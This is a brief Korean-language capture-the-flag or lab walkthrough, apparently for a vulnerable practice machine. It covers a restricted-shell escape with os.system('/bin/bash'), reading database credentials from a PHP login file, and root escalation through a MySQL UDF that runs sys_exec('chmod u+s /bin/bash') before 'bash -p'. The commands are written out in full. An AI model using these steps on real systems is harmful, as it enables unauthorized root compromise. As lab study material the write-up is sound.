Samba 를 이용해보자
john 을 이용한 sql injection으로 비밀번호 알아냄
echo os.system('/bin/bash') 로 제한적인 쉘에서 벗어남
ps aux | grep root | grep -v ] 로 루트권한으로 실행중인 서비스 검색
mysql 이 실행중이다
cat /var/www/checklogin.php 에서 mysql에 관한 정보를 얻었다
root로 mysql로그인
기껏 찾았는데 알고있는거였다..
mysql에서 root권한을 얻기위해 아래 있는것들을 쳐주자
mysql> use mysql;
mysql> create function sys_exec returns integer soname 'lib_mysqludf_sys.so';
mysql> select sys_exec('chmod u+s /bin/bash');
ls -a /bin/bash
ls -l /bin/bash
bash -p 를 실행하면 root권한을 획득한걸 볼수 있다...
root획득
꼭 이방법만 있는것은 아니다.
mysqludf를 이용해서 권한 상승
sys_eval 임의의 명령 실행하고 출력반환
sys_exec 임의의 명령 실행하고 종료코드 반환